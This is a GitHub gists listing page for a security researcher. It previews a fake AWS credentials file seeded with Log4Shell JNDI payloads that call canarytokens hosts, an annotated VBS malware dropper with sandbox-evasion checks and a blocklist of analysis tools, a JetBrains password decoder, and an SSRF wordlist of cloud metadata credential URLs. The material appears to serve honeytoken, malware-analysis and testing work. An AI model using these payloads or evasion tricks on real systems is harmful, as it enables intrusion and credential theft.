I hereby claim:
- I am plazmaz on github.
- I am plazmaz (https://keybase.io/plazmaz) on keybase.
- I have a public key ASDCStXBaUDQPBh36YOQRg_OttfvktUvoBPSi09wFgUwtgo
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| AWS_ACCESS_KEY_ID=${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a} | |
| AWS_SECRET_ACCESS_KEY=7638792F423F4528482B4B6250655368566D597133743677397A24432646294A404E635166546A576E5A7234753778214125442A472D4B6150645367556B5870${jndi:ldap://x${hostName}.L4J.itkyt8sp20uipz73hfob7x8xt.canarytokens.com/skey} | |
| # AWS Credentials file | |
| [${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a}] | |
| aws_access_key_id = yLryKGwcGc3ez9G8YAnjeYMQOc${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a} # Informative, can't be used alone | |
| aws_secret_access_key = nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX${jndi:ldap://x${hostName}.L4J.i3bjh8gykx4teaeyhsck7ormx.canarytokens.com/a} |
Plazmaz
/ config.yml
Created
January 24, 2020 01:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| notify: | |
| - type: email | |
| properties: | |
| host: "" | |
| host_user: "" | |
| host_pass: "" | |
| port: 587 | |
| use_tls: True | |
| from: "" | |
| enabled: false |
Plazmaz
/ jetbrains_encoding.py
Created
November 7, 2019 04:53
This is what JetBrains uses(used?) for encoding webServers.xml and other configs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Source file: | |
| # http://git.jetbrains.org/?p=idea/community.git;a=blob_plain;f=platform/platform-api/src/com/intellij/openapi/util/PasswordUtil.java;hb=HEAD | |
| # PasswordUtil.decodePassword | |
| def decode_jebtrains(encoded): | |
| out = '' | |
| for i in range(0, len(encoded), 4): | |
| out += chr(int(encoded[i:i+4], 16) ^ 57258) | |
| return out | |
| # PasswordUtil.encodePassword |
Plazmaz
/ annotated-vbs-dropper.vbs
Last active
January 2, 2021 09:37
Annotate/formatted VBS malware dropper. Don't execute this unless you know what you're doing (duh!)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' If these checks fail, this dropper will die in a recursive loop | |
| ' Checks if files exist in tmp | |
| SKXSwgvzc | |
| ' Checks RAM >= 1024 | |
| uOCNREVZV | |
| ' Checks for debuggers, AVs, dev tools, and sniffing tools. Fails if any are present. | |
| MHtrCHZpL | |
| ' Checks CPU cores >= 3 | |
| XWKtvlOt | |
| ' Checks disk space >= 60 GB |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Usage: cscript decode.vbs <array> | |
| ' Example: | |
| ' cscript decode.vbs "Array(g6,u7,s8,d4,z3,u7,b6,l5,j4,e9,k7,z1,k7)" | |
| ' returns qMUuDMFaZ.txt | |
| conST r2=27 | |
| CONsT rr2=38 | |
| coNSt C5=42 | |
| cOnST D4=130 | |
| ConST t=132 | |
| coNst g2=146 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cis.exe | |
| cmdvirth.exe | |
| alive.exe | |
| filewatcherservice.exe | |
| ngvmsvc.exe | |
| sandboxierpcss.exe | |
| analyzer.exe | |
| fortitracer.exe | |
| nsverctl.exe | |
| sbiectrl.exe |
Plazmaz
/ keybase.md
Created
August 5, 2019 20:21
Plazmaz
/ cloud_metadata.txt
Last active
July 14, 2018 21:57
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
NewerOlder